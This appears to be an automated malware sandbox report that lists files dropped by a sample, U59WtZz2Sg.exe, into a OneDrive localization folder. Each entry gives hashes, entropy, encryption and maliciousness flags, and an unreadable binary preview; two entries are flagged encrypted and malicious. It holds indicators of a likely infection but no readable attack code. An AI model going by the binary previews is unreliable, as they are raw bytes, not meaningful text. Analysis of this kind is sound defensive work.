C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mt-MT\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	205958
Entropy (8bit):	7.6391904879089765
Encrypted:	false
SSDEEP:	3072:WCUgQOD5nWH1n3KXFsLtXpUr6NF6MpZRmOeMYpddb+J8IHMIuUxZId6dmTC:W8RWl3ZN2mNF6MpZkxMCF+RvorG
MD5:	2C5024FFD172B588EAE4AEFE185CFE69
SHA1:	691D10414B19621E42A8465F3F45C72D07FE0EB7
SHA-256:	D80904DDC403D1B35B6581B1F5E4E9B04809020E34B2E19D80D8B1E2E461A6D6
SHA-512:	C9916EA0EE07BAA4942843FCBF696F56542EAEEC817C1F700A50834510F43C05521028332D4E8B20B6330B06261246FA3493911560CF6C423EDCC1E240EC6758
Malicious:	false
Reputation:	unknown
Preview:	MZ....P.....5.....Ug....w..T.!K...7...c..:..]...(..._3..7./".5.t^....l.....S..$..u..A....F..i.0M...J#..W92.-...<..~;F..7#..(GM.'.....8\b..7..pK...G.......KV..o]...a..C.V...K....x.6./&f,4@p..O..^J......Y...v.ea..&eK~.....Y..G^........o....o........W........).../~.%@.`,..\2..w.y}....'.8BQK2../..m....._.qMl6.......O...x.%..K.7.Mi.;.eC.A~..{.h./.{F...3.hq..5..<....a.3A.,..or.{........d..J......@...=.}@.'...m7i.z...]{..=..j.&..k..>.Z.&...."..7..f...t....;.C!N.,V_7..."...u.!..W.c/.....4.^\..^..:=BM......MKZ2......,.j<....T#S........@ .D.........D....&e.\.]jx...4.P@..\|v<U..v.R..A.m{..q....V@...4;.....Vs/.-jlv./.=.}...M...O.Q....0Vs..Z.F.'4.o..W...d.....PK...P.QU.....?k.x..<7x.#..GT!.q..f!pHzH....6O.$.Uy.C..+Y.T<I.v .....v.T..N...C..U@#.....h....;...k..s.;M+......h-iq.T...F5.q.-...0......P..{..2?.x.G..8...\.BiM..9H........W.......;8U..s..N.y.W.(2~./.S....;..1.~.f.....?..S..#hpGy.R..A...F...[.j.<.Gpg.i.5....t.C0..M.c.+....N...b.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nb-NO\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	193454
Entropy (8bit):	7.763442584482624
Encrypted:	false
SSDEEP:	3072:QIo4TtRH5w1U8hRIhOiy8snLv+WbG+p5J3zeZ3UNgL+2U4Q0z13nf94Yu0Xlc7zp:QI5JvWU8DqOiAxC+p55zeZ7L3UHjp
MD5:	1B419C24F039FDD1969C0F51CED9695A
SHA1:	ED32343562CE25C5413ACC35581ABCBC6BA0D23A
SHA-256:	64E0470FDFE22327405F46AA602AF3E1619963801A9CAC832F6DA9068084EB53
SHA-512:	DAB04DF9E765DE91D57739321A8E11453CA0D436D71DAABB4CF328A40D067B05D0C434F5A730E4D9A00036C30DF443AC5907D11846409C8EC13A129BB33295BB
Malicious:	false
Reputation:	unknown
Preview:	MZ........3....[C;.U.3+.'...K....u$.G.n..5..<.`..R:..Gtc.\....Bg.N.8K..i.....Bj<=..#.....Ajx.....m......h.A...o..2....V....~]E.#....d.~..w:.......?J..AJ..I.'.,>..(..n.X.t+.k.9.....P`.s..g;.".M~N....,...:p......p....IBS..woq.'..........Xb...^X.u...u.....*A6m^v..!.K....G1wq4...AP.4..kgC...F[..m..3x..,...z....50...6.<.........-y.Y8MI.>.....L.)..(...>. ...JX:..G.1H.,u.........._.?..y.?.......J..k'c....c.7Y....%...X.W...Ua....m@.r.Q$..vS..x@\.d.o....U....2.D0... ..Q..FeC.`z.[bn....._.i..l9th.....k.4..........pm..;.oJE....H_@....C.8.VN..~..o.&m.........u.......'.d..k.j.f...G...SYy.Q..r.P.A....8ClK...@0..HFk..........E...... .sG.V.S.U...:..%A.........n..........f....5...Un.6f.v?Geg.Q^ah...j...W1.=.w..G....SV!...brr_....r....].u.<......Gh....D.w.\....K.K......s...G........Xp.;I...........sF..R6.].....i...b.F..'..q1X.bu...4p..y....X.0.....$.g.Ee..R...{.Y.G. M{s.".. [&7).jR....i...{.3.........#v........'5s'.-z..R.Z..`.........K....g...,

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ne-NP\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	209030
Entropy (8bit):	7.669640667950751
Encrypted:	false
SSDEEP:	3072:5RY81bU14owMXgumrZzGC//0stO88wLdDT/GF/Lurf0qhtYPqPkFocH1El:XZE4XMXpo5TgwLBGFLur1tYPcUA
MD5:	A4FAB0A49996CD4218A141A17AFE6C0D
SHA1:	5BA915B076AD616C46CCDAB276A639835DB63969
SHA-256:	8972582805CDE51899601716FFE192FA0F97EBF15D4B09ADF4F9B27C8C574F76
SHA-512:	A918A570DC521E695993348F516FA571D9BB3F02F727AE71686F5349E67F27B6808142DA9E0AB594D0983F0FA0942FF2C04631AFB41B2055B717EAB2C5BCA6E9
Malicious:	false
Reputation:	unknown
Preview:	MZ.....3...Y.h.Kj\rW.\.6.._...j......k-.\|.?Aw.+l.w..Aq.?....b!.+.(.@.;'.....3w.d.....N(c."...~.%g.K?...Ew-.]....z..(..8.Z..}..A.V.x...I._.`ms.lK...."..G.C..rx.....m..$...,m.>v.Ic.X./q.6...v..G".}..O.....u......!.....r?.i.X#s....(....-Y.Xl.y..U.\|....O4lw..ni...bz..,-$_I..........:.@(E..yw..bn,(k...5.k.F..k.[..`;.&.!H...yQ...&M.^.....2.\|.?}CS.'.f.x....V.z$.......i/rM?..J.G.&C^.6..G.{.9..HU]............+qZQ.g.....3/..S...$.AD_......"r.F.K...t=a...h...>....@..d...'.i.$~.JVB...\|..\..G{nPcRp...L..h.....Kp..k.....W.N.Ce.}..H(.A.{..To...l.h`2m...i[..6.V...nR:.j.5.0+..8')ekf......>>L$Z7....)..\|V{T.F...n.&.i......6,..[.J.HH..PZ.E.Q.....oR.h..oT..p\|.X.>.r..Qs.. P"Ac.e#..............S.h&.w...y.%....b;.4._8Jc4..+...!..\|.J.~...H.{.Wl.0..%..~....T.1...k_.....N+..B4.y........!;:....h.....R..Y...B8.B{{..1.Lo.3k.IE...,.5PM.C.{.H+.F..pQN...k..FK&5e.7.J*Oes...1.c......[..Y_....[...._Z..SH.S.,....\..g.{..2.N!.l.l..x>.R.c...+......+.JCy7p....."2.....k.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nl\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	211078
Entropy (8bit):	7.558058335022623
Encrypted:	false
SSDEEP:	3072:W3aXbAO1h3i5uefgRAe9P+cv0x4inKSlF9gCzqGYaPmjfnpmL8gNeFxbG7sENSvd:f31YxeTFCbKCFibXTEmFLWwB
MD5:	1347CC92B56D543FDA7046A81CC0113E
SHA1:	686A81FC4E02439B08792278E45D66582907AA5C
SHA-256:	81C2F10F354395FC65B5CD88B64A5B8C5F44DFD4C50B7C0A5DD020443B80B85B
SHA-512:	F0C16232696B5D2FAA91DF2CB37E6895B65608EB61714AE9D93D88DB9B42ADEF831BCD78CDDE8B56669AF16E94DC025E0CCBEDFFC2E8384AC4109753F8103CAB
Malicious:	false
Reputation:	unknown
Preview:	MZ.......K........y..F8.L..V.2..T..........O..5..[.....q.#...!.b.T..=6.G^.K.........^.W4<.\.........SS.^/.Ki.\..WoA<."..&.).'.S....'R.....Ie).Z....."[..u...n\.......5.>.)V...,P.chB..Z..../.'/N.H.......1...\|..I..K...FZ.Q..?..e..[.y!..T..Hh....;......<.".3.\|4.}.;B.$%\9.)`..D...5.7..(..`.~4....Ct...?....:..]Z.ti..W............-..L-.n..p.....W<..g..{.#..k.@L..C.tj@.+.fu...[D>AQ.^.....v.#m..<v.Ik...6.I&.Q.4Z...P...Qv.OU}.t`5..'..P...r..U..{(?.j..T..G.....5.2......g.L..w.sSvC\|.1A./:...\.D......7.....tX.]7..pv.b...p].....V..[y7_d......L..9....8e......p..,8......B1.../0..5...\.L..._.A..IJ\y...@n.5...../.. F.H......$....u...i].....e.>.k..>.I.......v..kFE ..^....\|,..C~B..f<..'..2+..!..p../..M`&......9A......W...F..x.EPs~.:^P.@.L.8].IpU..rP"..gJ..H.U.......s..@LxF..\.."\R\....f.sA..T..M.q".dnt...q...^...J..a2.}......F.[,{w)......{?.... =..s...-.^.]...1."'...,.....Ht]..W3.@..b.).....d..a.../.....v4.'S..,.q......=..>;O..T...p....*&\.zi...."1.~....X

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nn-NO\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	192638
Entropy (8bit):	7.778891713952212
Encrypted:	false
SSDEEP:	3072:CZrJmS724GtpAzDJ5X3v5ipv3M3t7/r4VNWBWd1fWnk5ufGHdYtKxXwl80WlltYa:CZN/72LvAPJhxGPyDr4VNWmJsk5ufG9l
MD5:	57C88C1149A755FFE054A437D1B78FED
SHA1:	1C37EAE2D4320FCCD43871FE6928B8C2785F4400
SHA-256:	9DF25575FF70D42263E24A25C6BECA8CEFF491C3FD857765B3C541087155DED4
SHA-512:	D1C9174042B0EE70150044344167EE769F1E0E1B81E3745761689157044699D68B47D8848EAA9038C4ED78FC6E84EBC754FC8C2C5C0B492DBFE1ACBD112E46BD
Malicious:	false
Reputation:	unknown
Preview:	MZ... qs.N...D..g..\.<...c...D\a>..@y.....~..$f1.......,..&z.Ais.......T.......l{.~X.l.......7.5.\.4.}..y.\.......j....;-.19L.d.....e.a..[....#.0$U.L7...$z..D.i....z.M....h..N.{_jT...{..2...h.g..5e.g.f.P....,.cG...Vb...H....././.z.LUM.:.7-.......w....J.b1."...AE...$... i..Cr&{..3&..}B.'AX.2.m.m.{YJ.B...C ..iy.T.<..Q..S.H..x.8..]q.4..P.d.D}DH.0..P...g......~...L......D.U.........:..b.....x..?vuP..c.p~3P..B....&."..u....y....L.n[..sj...%/.Q......+.........Bt..%....sa.Y...._y(...N..aWP.W.........U?...P...8pFG8.......8..Ke..J.Y.g0ki....e6x.K.\|j.....eV.TwV1...Y.a.K.n......i.Pb..J.;}.w.....X..[...~......i(...3.......Qn.c6...f&J.e.Q....s..cr.quqjc....Y...c.[h.....D..;..nX....\|.em...L...tQ.....Km(6RP.P.."..._..%.qu.....l\|g.G....S.;.o..lb...J...Z..W...9....+0.Z...g..*1.X.t.....x....P.5}\..`..?.,.YV....Z..Z...C..$@.4_.....d&..N.......$...-..k.6.......b.Z0U............./'...`..x6.[.3.`i5.,.x....\..J....F...o^`9..... ...b..]..i.+)..v-...8VC....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	170118
Entropy (8bit):	7.990297431241128
Encrypted:	true
SSDEEP:	3072:HHH2PYv93zX8X+0kAegmYVfD9tIzxdjQDo1PZkWApP0WvGIGWAFMSqRNoBk:HWYv93zX0kYmm79uxdjQE1x7AOWvGXq/
MD5:	D5CD375472D523EDBAEAC974E6CFFCBE
SHA1:	A2CE7034726FB72E2C6873D80684FA847E663A88
SHA-256:	C3F987449198E7ED082C276A8B82BE3F1D290FB6C84B71041FDEF3CE34822CD7
SHA-512:	9365A9D5FB8BEFF82770E025C9E737AFC91DF0A49E7DFB9CB933BA003474773540A9DFEE07069F2C65ED351D406765EAFF9B1ADCABD7286F19E0BB524EE26838
Malicious:	true
Reputation:	unknown
Preview:	MZ...'.!G8...?..$.jb7..R.=..~.;...m^.......p..\....>}?.......!0Q.i...W[W/...h.!J.'.........3.:+..zz.^..Od[.........(..nI.O..jk\...\|....o..G....(.h.d.Rl...e/..Db9...HE....#..oc:.lP._a'E.......M.`]...d3`..uML...9........\|}.....da...0.x.....sG.F......T6...b.....aJ..vJmS.7 ......w.6.....B.[..5..'R..y5G..y..x...8.,......MKa....sKn..u..6..4..C....a>...a.r..:.."..&6.._...ua....v..+n%!...;A.J...W...v.....U..GU'.$.-;^....'. .;.kC...j..).i.>.\|...r...!..Uv.h........8;.c...I{9.e....5.M.Ob.{..R../...'...GVy.<.s....I..... .._...,I4J.).7.......4..bX.R.../.../y..1....W.2........\...e.PT..6{6F6e..I.2.a.L..;.:\|..^..{.h.....P...-KN...\......zS...:.l...S.[....d..MdX.(.b..Y....~...75.L.S...\....<8.Ezhu&8.B.DO.d....n;.z$...2sk.t..y...X.5},...D......:.....f..y.....B.....N........$.......u........k.J..g...oa..I.s3.....j....(..f.k..B.JI.G...x.f.T....=..c..%K+.J.....d......6u..V.......F.m...'8........I.KDD..'....)...^.`..mqy..t.}.>.H.....gq.2.j....92..7.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\or-IN\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	220806
Entropy (8bit):	7.563288156146391
Encrypted:	false
SSDEEP:	3072:wwZHPpLIRUyg1vyWZ3WbwUWcS9taGd0sE82IYQAXpzElxnU1xcsoAoEMb:vZHhOUpvyoCwUWcSt2DHpoJU1xcs/a
MD5:	7C79E5541AB03D0684CA74BC79AD5B46
SHA1:	A8DCE54F27C1C9234342C3C301CCC90100964625
SHA-256:	7728CB92ECE4DD148C58108834FE746CE83FCEA261B21B52FF0A9F1D8BEBAC1D
SHA-512:	D6ACF42F5C512FCE54DAEAC44DC8881112CE3E2C43A7A6DE30BA5B4E4BEA29C260EC9EDEE462D3543E10142ECA209ADA01DE1E0641AC30DEBCEF2677143D7E5F
Malicious:	false
Reputation:	unknown
Preview:	MZ...C......w........ob=.w..B-^........Fd.A.. . :?.J..-.O._r..L......!.....d.8.1..w..v..=.}.8..0.....Y....a..^.V......."J.?.E.>.{...\|...F....hR.1..._..kH.\|..g.%t@.d..H.0=.../...d.k.....h.$...;E.......w$..V.H...E...l.m.....j<.`S ............#3.]\|...k..q..g.Go.u.../)....C.Ok..m.k+"#b....A......8.w...]t.sN.[!7t...2...K......v..1bw.I..uz...........}H{v....a...8.....=.}%ML..v^._p...Y$1...E..yR..4Sg6.R.-S.....$. L....rdt.;O.]....1?...\....,.3O.H...{.r.pR}.k.E..u......./.?...w..P].e*:./'.......Ok..~....r..I&....$.....w..q...@N.........../..^....K.Q..x#B...,...5...Xqk.......R .>UH...mw...X....l...gHa.].PV...........e.iYDYP.......l.....\G.~..S..D-(..#...q...............%,f..Z........+...o....sQ..IS..h)k..yZ.....S!...Bh...4y.....pjg..iX...3P$@/.F2!5e.$8..k.......H..a.i....F..O....1....l.....@{. n./.n..%..-h.r..w...V...KK..7..s_.I...3...B....p...\x.)...x.H.=....6......m.7)...IjM?..].3.......<.kJ.k.y......T\C..B.&~::\..'..S0>G..v...71.8.X.d..r...r.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	161710
Entropy (8bit):	7.9963716720608575
Encrypted:	true
SSDEEP:	3072:RrxI7IgltRZbIbHe5RKpxq8+ej1gxAWnMCMdVyBu/7RGlyy2lHOxMwIJo1ZO5:RVI7IgTRZbIje5RWw7k1gWW/DyRGlyyo
MD5:	47A0EEFEDB87811DAC878DC3C3FB8F6C
SHA1:	D17DE4336D8F4A673AEAFC6B7AE729359A236127
SHA-256:	B9DCD45376681D101FD0C9A0C764D5CA4BCB3953BA3B93820302BDBBCA739CEB
SHA-512:	42F69E56D50A63D4BE3EC14F99DF412D445742F77E1FFEB082A231F7109BE65A573FDE85A633EC13C0C9699CB30AE9E2ACFB69739B8EA5F69FFBE721688EF50D
Malicious:	true
Reputation:	unknown
Preview:	MZ...EP.7\..@.>.......`@,pb..<".b.(i..Z....V...9..@(tx.J..K.D.d..m.[YNQl.'...M....W...Rb.&..f^.zu....92.8.....d..;.5..9t..X.5..zd.Cn..Q.....7zK.%.e.@%.B.S....5\...9f.....:.J:..............uQ..9...e..J......A.@X#.p.Wa?..].@!../T...Q.9....";..f...G....D...y.K......V....O..$70{'..6.....4........,t9{.;r...A..7.r0N.N......#._...`.B..n..t.=.'.l..H.+..E..H...a.y.x.\|.:........B@..V.:.VB..@9..tI9.v.....c.../H.....o^e..vB..\|.\|$..x[..'....U...q...N.V...y..x..(..EdH...h.#e..f.EW.!..:....u...=#..v).e..-C5...J.=5.6a........O.g..j...P3.......U;.]..c'p....:..q.....i7Q4...};A..}.L..9_....H.._Cg...P.5)..P0...e............2.V.....0.fss..:...o".tS..TT-%...I....'....w....3.f....P. Fh......e@...7f.x....:...L{...n.:.+.4]>.l......b.slS.^...c..N....P..^.BY........M.....y......j..c.w\|....0...S.A0.s..Q&m.9.w%.q...rR&1.A.\......~._.u.rr.S..^<.\|.B......*xv.......6......`...D.A.Q.u..#.Y...^N....+...:..H.h..b. Ma.l.y...`[.....6!....m...sA.S...i...b..>....f..)

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	205230
Entropy (8bit):	7.714774884818332
Encrypted:	false
SSDEEP:	3072:+Y5bZFWLredLOwcYLqggrMl0FgShHBw1kpowzcp7UYRlZL6YDkRumBc/Ie:pDWLreNtXFgfFgcBJo6cp7NRjuYgRu7
MD5:	092D23D0EAC22D8D8CD23D8C9491A2A7
SHA1:	AF409FF3C4614DE6ED882DD6326CB23916A83B1A
SHA-256:	EF015AAB0901DF09C7E404AB7EDCF1D61DE4490DF4E15E52DC068237126E501A
SHA-512:	722231AFAECD53FC0BBA70ABD56225E65D78CA8D19CA979561AB9FFE60D51D9EF97434D8BDD849E7B6C97DE962B91D6D8CA8328E821E7A2DBC7BB7692BBD11B4
Malicious:	false
Reputation:	unknown
Preview:	MZ...>J..%..b2r..o..O.:.8.p9X..ev.E..j.[9.j........h.......Y.%..}1.=(+V...u. /k1..9...^.3......{..h..?..Jju/.SC.r.gz..n.....V.k..06..>.>a.Qf.+.'.K.x..^..C.~....$~H....H.K..Ew......!..!...z3..g#.]#.>.-..SR..v.f..>..6ar....%t.....~Z#..._.&.......b..h~Bp.......$f..E...^?.`.7w.!2A...i).+o%.ee_.l.M...{......&W\|aX.:1K....[3.U.....[8....z*.Z...............~...4./.O.......q..."N.B.N4Z%.ce.B.m.sr..O.)K.YS...-...#.U..,.g>...>..0Mt5..K)..N-T..F $..x.3./l....2;d...ly,G.o.@f1....9.....L..f.S.+."3..._..M.Fs..k...GV..e(.zo...XK.,g.h....n.ICg.....U..V"...~.X.6.R7 .Ws..a......_.B....N....................]...}...t...oR....+R.\J%.].C.@..t...Q%.p....aoH8;n..t\|..`.....X..f@..G.0.i....ex.4.9.T.....-....v,.#......1..G .h.e/..2).p.Q.aE.....[.{.]H.O.m.E.T.oI'.ZU..s........CVC_.L.......5..(.i......{...v)....9....W....._gb.g.ALrvXt....._....J...wC.@.S...N7....C..]wAu...&...B.@U...Ji.....B......_.mZ#.l..6...W.2>.....3t.).K.W.Mo).q(.p..i..Eii..=g...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pl\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	214958
Entropy (8bit):	7.544625976143692
Encrypted:	false
SSDEEP:	3072:isBiAEf6lRdRvIG2NsQuZhh9WlKhSRNqLI3/fS0jeTh0MgfRlqr4rRvYdP:iXv6lLRgGxqlKhStvfdeTh0N50cM
MD5:	9AD85581B8C35F6B1880DE811ABC7535
SHA1:	47558FC3D9F17825E2FFAD0E37082040F1E4CF94
SHA-256:	D501EC30BD9088CC37B2E7C0CE08C9EE84D498C45ABA5AA3E26A2893A6733106
SHA-512:	0C6406B1D7EBD41EEC61A10FD3D174D620FE7DF319BA5AF3A4E87B2DE4E8B7AD3AF90CD5CE6AC85E9EBD99C0498711B0A06126D8E54136CD78A67162A81DFB74
Malicious:	false
Reputation:	unknown
Preview:	MZ......L.\[kx.....[...b......_.rX....'.}..8x.M.W...ND.T.=..\.f..s........S..............E..#...O..x.9..q..i.1...k.+.9..P.?5..3Y<...;eC6tr.=.....H..A...J...67z6....y;..%?....A......?..V...\|......J.R.....88d`..I..%..2.z/o..m.q......../...MN:.1..8H...t.'..a.\u...(..)....\|.....R..>...G....Ll(.w.)R..2(.B.P}eGv..UZ.d.H..".@..K-..;6..7q........#.xY....9..G'R.Q....X...&.O...0......pZ./.<......Gc.{.U... ..1.$/gY.28[.zZU.-..Z_..J..4=7s.o#.4.1E".^.k..=..8x.?6.M.zf.$..r... :....y.b..y...=..../.?yD.'..^..3V.j...R^no>.Q.^9/+..T..iKU.^.;.w)&uhh.i.....mx..............!..h.`7......[xh.T#...<\|./[B?..j;.Ht.=.l%pDjg.=LO....B.).FZ......sP.0.k..L..l.....49.]..kc..Z.r.c.M.\|.wE.=..<.-..A..../.T\|.y......._.].7lOxV....X...iKy..@..[.* .J...u.).nT..:....d......B..s....,I.....0..0.q_.....3..d...B.&....(.Z%..j]<.+M.....-.E.IC[y.y.)4!..!....l.'.vO..!..P..\.{. .m..%.....F..7#!.~....h.8.._I?V..`U..b..v.*......ZL$.Z.1.(...j..mi....{....~..$.[...,<.,z..n.{.aHc9.r.^....Zo

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\prs-AF\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	198278
Entropy (8bit):	7.763776051100087
Encrypted:	false
SSDEEP:	3072:RDd1Yo6tQmNC4GXoXpiYZK7ttttg9eVSvKSCpGxAtCU7LVdHeuRpvQb:RkQTFY5i2et3C2iKSyUAVm
MD5:	C53999476BC9A8466F6742180AE72B8E
SHA1:	A91A096B6DB18462B494AB7C2E7D8FBFB331EFEB
SHA-256:	134B5E87FD54D4B79461C05F50834C24D6204892CCDE5A6AD615602636613353
SHA-512:	2ACC4435C426A242D0E43F475EFB074BCF2251BD85370B4A4E157CAA663681E25A0E2B2C824E2E10298784618AEA4B9B9AC8A71A6298A9348954981CEFEDEC25
Malicious:	false
Reputation:	unknown
Preview:	MZ....8.J..".u.O...s......C..7dL....,.SY.s.....<`w"..e...@....2...1..............C.`... .q.s!8.~..?...\..o....y.....>.r.C.r..x.v7_..L..D'.#.zA.X..+X.....@"E.."(_..R...."'..q..#oT.Z.W.@...2{..5]X..#....cq..u..-....<...?.....ZJ..A.dY..`....'Z1bv.9k...._.p".c....y.9..L...#wSb...4.n......u...ss..t..a..$...V...M.....%.r/7-.8 O...0...v..s.[.....T.v/.......c...R.H.0eW....:..c..Yq....\.dZ....bpM......3...T.).!.s......}......ku...r.@..~..RH".`.j.......wvH..gp../....%q.....G.P.2&..j.g....8.....Q..rt ...[.Gp.:e......o..;.Q.......`._.......)e........T.K....rb.j..X.P..U..M.r.F........~.{n.G.."`G2.. ....6.....?..%t..G^C..+...$.........3.....[. .........V........I...r.Ju(E......KJku,....=6.C......%.S.....J....t..M>.)..UW...g ".$1.^o;...5..\|kO.S...SH....H.enF.!K....H.z.3j.>..%..O!..\|a..&.B9....\.....^.g..<.<R2...........l.....R_..L$S..J.,.1P9...G.#.........g_........ ..:1.b..+.5.O...R.\.J....Y....#/A..N.#4..+.....f.-E(s.0^\|...U...a...p.cm..a.d.9o....T...*X..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-BR\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	204934
Entropy (8bit):	7.628847251785613
Encrypted:	false
SSDEEP:	6144:IS5kfYdlvZUEIUMwOuh/LyMxdT3J8pHneLK8:V5kfGBSDUMwOuhTyMxhmpHn8
MD5:	028085A696AFD1AEF4A30139E0E3C415
SHA1:	00ACA30E50D7B10B5E59FA4E6EB04BA49F867D43
SHA-256:	B8355BC8646B902EE15FAF4C4284E5AA55D77CCBAF909D9CD7451C27BC0A3301
SHA-512:	C6BD2AFFB6216D6E3EC58DFD688D33B6741FB9C76333D0A9B4D6F09B8AB00981043FE634CB8711B96142B399619143B6B2974602FCFBAA324CA8151E57D70EBD
Malicious:	false
Reputation:	unknown
Preview:	MZ.........].\|.&l..eG.W.5...!.9..Ui3....>....].s....5Q~;~.....H8.(.\........{.N...HVhUAy....@.q?Ll.F.@=.6..h.#...].<....1.F%JO....M.......F'X......m..j/...f2......... [....X/.?5.\|.g.)...J{.r.....}.Ir.?.m....O...t..u.Yl~..s........^.i)b+l...&,T.\|c..rp.z..\|..1.......m.0.2IU..L..H....u.J..:..Xx.j.)j..kA.~dN.....bR.w..]..!4...n..\.\...jAL.....k.>......M......J........$]Z5....U"....D...F.wa'X$.F.:.{..a..Q':I6.....f..)a.&A...s.K......=i\.....d......7..jvz..@x....V....f..M..A...s._.NC....b?..9;...}.sP.cF?.c..f..o..g...........(.e....n;7...a.[Q/..t.2...N...l...9..[%..<jvt...m.-.%^.....6.k...Q>....h...9.DX.x..D.E...L.p5'9.gq\C.I.#...E"r......V....4.-....yy...`.1.\......,2@..Q..d..,D.G.."...x.....*.....m...m.~........`.=%.g........u...n-L..?...]...k.4.7..\..oFU.#....Y.]i.qa.......zp......El...&..@..!..R.......N...=.s....>.EC..p.Bl...n..HxK.(-.N..n.....9.....d.k........9.Njv.b.F.wp{.O.e..FxVQ..aJ!.....i...........p..g{.....0.../...{.%2.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-PT\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	213638
Entropy (8bit):	7.529025626628922
Encrypted:	false
SSDEEP:	3072:kOjcPnHKHzHb/grrVb43lE0VKZ4I0yAxD2X/fs59j2lH2xzuu:kk8rRb4TNIOI/EzKlvu
MD5:	9A964BAB4955C384FB8A8CAEA7334DFF
SHA1:	C137D074D306971E57B2C66DF091686A3B03482D
SHA-256:	B236C9D3945E7E2E6F7979000D59930D813944EE4A9BA287516F638E01ABF2D7
SHA-512:	D9B52050B518902FC41851A541139F7A6CEDC8A6BD5A83B5BC929C55ABFADA26E390F905DFF9B325AB1B9BD0406DB9BFF844E73A7669B44DC1C0B0B71AAFF0BD
Malicious:	false
Reputation:	unknown
Preview:	MZ....a..]........e.'.fZ...5i..d...._...i...CL.o\..6.U.8._......._...........B.^\L...k..f.[....Ur.....8......(.feJ...K..O.:.uN&.x.Di.../....cY..{l..y`..X....w...3..'S-......`..24....^l...X.I.u......T..yD.>...}Hz....@.....3........\..I@.:...8..phi.H.#..';1/..y!...N.....'.@O.E:x.b..L wKp7..v.7&n....jt'A.=>.-.L....:.....R.Z...C."b.......-.DM....y...^.X.......)....Y.P..H.]..d}EU..a..mD<.Q!....yb...Q..P......e.%.-~....o..f...6..w..Q..Yi.]`P..t.e.,w..\|...@oIr....P<?.......=...>[..@^...\....(...;2.t.r.v.#L..A.R..]..;..W....g......m.........0....(d.Z.s.........x.\S...//.V...@..pPJy..c.....4.'...%2ptc..}3..3.d.x.C...R.....h.J....W.u.......c...B.9..W.............._..iWk....Y.z.#.'......s....."/f.E..`...RF..z..0>..B...vZZ..S@".7l.....t...vS...7.W:g.j@.....V..8D.&..SCJ.I.F....(?..4....U...b....6.dG+.Rw./....UyK7.i,...G.e...J?5*.."6q.P...>....b.M.......]..>o^>....M...:.'&..........D....2....5..{..G.D!.........A..BN..~......A1(.....Y.}n8.o.q....D..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\FabExMDL2.ttf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	236018
Entropy (8bit):	7.777332857160132
Encrypted:	false
SSDEEP:	6144:ETCS+ChVIZf7LMzHBrt3egRJJE6a0K4rXXOe3gh:Es4qZMvrJxaWLCh
MD5:	C55218B48E11D7D835F92079E13B0D76
SHA1:	29E7ED7BF9C78C595DBC4113B591BA465F123123
SHA-256:	394C121E317D952A23B85EC57A54143E1BD565806EA1F98CCB8A6A22643F1308
SHA-512:	4BF2924E694E2D3F6C08AFC0362A1F08AC016D9E8B0FBAB58E54F5B32E691D18B01D94260C4E02ECD17633195C95B5D0BC75C1ADD85AD2312092CEFA7E5C64B6
Malicious:	false
Reputation:	unknown
